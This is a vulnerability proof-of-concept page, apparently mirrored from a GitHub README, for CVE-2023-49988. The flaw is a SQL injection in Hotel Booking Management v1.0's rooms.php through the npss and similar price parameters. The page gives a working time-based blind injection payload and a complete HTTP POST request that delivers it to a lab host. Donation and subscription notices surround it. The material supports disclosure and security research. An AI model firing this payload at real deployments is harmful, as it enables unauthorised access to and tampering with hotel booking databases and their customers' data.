Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2023-49988 PoC — Hotel Booking Management 安全漏洞

Source
https://github.com/geraldoalcantara/CVE-2023-49988
Associated Vulnerability
Title:Hotel Booking Management 安全漏洞 (CVE-2023-49988)
Description:Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php.
Description
Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "npss" parameter at rooms.php
Readme
# CVE-2023-49988
# Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "npss" parameter at rooms.php

**Description**: A SQL Injection vulnerability exists in version 1 of the Hotel Booking Management. A malicious attacker can issue SQL commands to the MySQL database when editing the prices and discounts of lodging options through the vulnerable parameters npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, or dpdst.  
  
**Vulnerable Product Version**: Hotel Booking Management v1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 28/11/2023  
**Confirmed on**: 19/12/2023  
**CVE**: CVE-2023-49988     
**Tested on**: Windows  
### Steps to reproduce:  
To exploit this vulnerability, an attacker can navigate to /HotelBookingManagement-main/rooms.php. By injecting an SQL payload into parameters such as npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, or dpdst while modifying the prices and discounts of lodging options, the attacker can compromise the system.
**Payload**: (select*from(select(sleep(5)))a)
### Request:  
```
POST /HotelBookingManagement-main/rooms.php HTTP/1.1
Host: 192.168.68.148
Content-Length: 127
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/HotelBookingManagement-main/rooms.php
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=aih2rvevdrpegiqt8nlstav7am
Connection: close

npss=(select*from(select(sleep(5)))a)&dpss=2&npsd=800&dpsd=2&npds=1100&dpds=3&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=
```
Discoverer(s)/Credits:
Geraldo Alcântara
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →